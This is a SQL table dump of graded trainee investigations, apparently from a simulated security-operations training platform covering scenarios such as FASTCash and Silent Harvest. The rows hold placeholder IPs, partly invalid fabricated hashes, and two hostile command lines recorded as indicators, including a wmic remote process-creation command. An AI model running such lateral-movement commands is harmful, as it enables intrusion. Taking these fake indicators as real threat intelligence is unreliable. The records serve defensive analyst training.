(456, 189, 321, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.2.15\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:54:12 AM\\nALERT: Persistence Mechanism Installed [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.2.15\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:54:27.135Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:51:16', '2026-03-09 02:54:27', 0, NULL),
(457, 189, 322, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.102\",\"ip-192.168.1.150\",\"hash-3f1d0f1e\",\"cmd-1\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:57:07 AM\\nALERT: Lateral Movement Detected [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.102\\n- [IP] 192.168.1.150\\n- [HASH] 3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\\n- [COMMAND] wmic /node:192.168.1.150 process call create \'cmd.exe /c whoami\'\\n- [IP] 203.0.113.45\\n- [USERNAME] admin_jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:57:18.209Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:54:27', '2026-03-09 02:57:18', 0, NULL),
(458, 189, 323, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.25\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:59:06 AM\\nALERT: Data Exfiltration Attempt [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 10.0.0.25\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] confidential_data.zip\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:59:15.881Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:57:18', '2026-03-09 02:59:15', 0, NULL),
(459, 189, 324, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.23\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:01:48 AM\\nALERT: Suspicious Network Traffic Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.5.23\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] jdoe\\n- [FILENAME] suspicious_payload.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T03:01:58.280Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:59:38', '2026-03-09 03:01:58', 0, NULL),
(460, 189, 325, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.143.223.91\",\"ip-192.168.1.1\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:04:04 AM\\nALERT: Malicious Firmware Update Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.143.223.91\\n- [IP] 192.168.1.1\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] firmware_update_v5.3.2.bin\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T03:04:18.391Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:01:58', '2026-03-09 03:04:18', 0, NULL),
(461, 189, 326, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.101\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:05:30 AM\\nALERT: Persistence Mechanism Established [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.101\\n- [HASH] 3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\n- [FILENAME] /dev/mtd0\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:05:43.039Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:04:18', '2026-03-09 03:05:43', 0, NULL),
(462, 189, 327, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.1.1.5\",\"hash-5d41402a\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:06:42 AM\\nALERT: Lateral Movement Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.1.1.5\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [USERNAME] compromised_user\\n- [FILENAME] malicious_payload.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:06:52.676Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:05:43', '2026-03-09 03:06:52', 0, NULL),
(463, 189, 328, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.23\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:08:02 AM\\nALERT: Command and Control Channel Established [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 10.0.5.23\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:08:15.658Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:06:52', '2026-03-09 03:08:15', 0, NULL),
(464, 189, 329, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:09:17 AM\\nALERT: Data Exfiltration Attempt Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_report.pdf\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:09:29.739Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:08:15', '2026-03-09 03:09:29', 0, NULL),
(465, 189, 330, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.5.23\",\"hash-a3f5c3d4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:10:47 AM\\nALERT: Privilege Escalation Detected [OP: Operation Infinite Loop]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.5.23\\n- [HASH] a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\n- [USERNAME] john_doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: A. MANE\",\"submitted_at\":\"2026-03-09T03:10:56.034Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:09:29', '2026-03-09 03:11:59', 1, 'issue'),
(466, 189, 331, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-09 03:10:56', '2026-03-09 03:10:56', 0, NULL),
(467, 225, 1443, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-172.217.18.110\",\"ip-10.0.0.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 2:20:39 PM\\nALERT: Initial Access via Spear Phishing [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 172.217.18.110\\n- [IP] 10.0.0.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [EMAIL] j.smith@aerospace-experts.com\\n- [URL] http://compromised-site.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T03:20:49.010Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 06:28:44', '2026-03-09 03:18:44', '2026-03-09 03:20:49', 0, NULL),
(468, 225, 1444, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-3fa8f88c\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 2:22:21 PM\\nALERT: Execution of Custom Mac Malware [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] 3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\\n- [FILENAME] launchProxy\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T03:22:28.803Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:20:49', '2026-03-09 03:22:28', 0, NULL),
(469, 225, 1445, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-10.0.5.12\",\"ip-203.0.113.5\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 2:23:40 PM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 10.0.5.12\\n- [IP] 203.0.113.5\\n- [USERNAME] jdoe\\n- [HASH] 7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T03:23:46.689Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 03:22:28', '2026-03-09 03:23:46', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(470, 225, 1456, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.50\",\"hash-d41d8cd9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:41:48 PM\\nALERT: Suspicious Access to Transaction Switch [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] APT38_tool.bin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:41:53.954Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 08:46:01', '2026-03-09 05:37:01', '2026-03-09 05:41:53', 0, NULL),
(471, 225, 1457, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.123\",\"ip-192.168.10.25\",\"hash-b6a9c8e1\",\"cmd-1\",\"artifact_4\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:43:00 PM\\nALERT: Malicious Code Execution Detected [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.123\\n- [IP] 192.168.10.25\\n- [HASH] b6a9c8e1d1d7d4a5f1b5c3e2a8f4b9d0\\n- [COMMAND] cmd.exe /c C:\\\\Malware\\\\ATMCodeChanger.exe\\n- [FILENAME] ATMCodeChanger.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:43:01.207Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:41:53', '2026-03-09 05:43:01', 0, NULL),
(472, 225, 1458, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-51.15.123.45\",\"hash-d41d8cd9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:44:02 PM\\nALERT: Establishing Persistent Access [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 51.15.123.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] svchost.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:44:07.314Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:43:01', '2026-03-09 05:44:07', 0, NULL),
(473, 225, 1459, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-3f4a9d7b\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:45:11 PM\\nALERT: Coordinated Mule Network Activation - Step 4 [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] 3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\n- [USERNAME] atm_operator\\n- [FILENAME] atm_control.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:45:12.720Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:44:07', '2026-03-09 05:45:12', 0, NULL),
(474, 225, 1460, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.10.45\",\"ip-203.0.113.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:46:12 PM\\nALERT: Exfiltration of Stolen Funds [OP: Operation FASTCash]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.10.45\\n- [IP] 203.0.113.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] funds_transfer.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:46:18.046Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:45:12', '2026-03-09 05:46:18', 0, NULL),
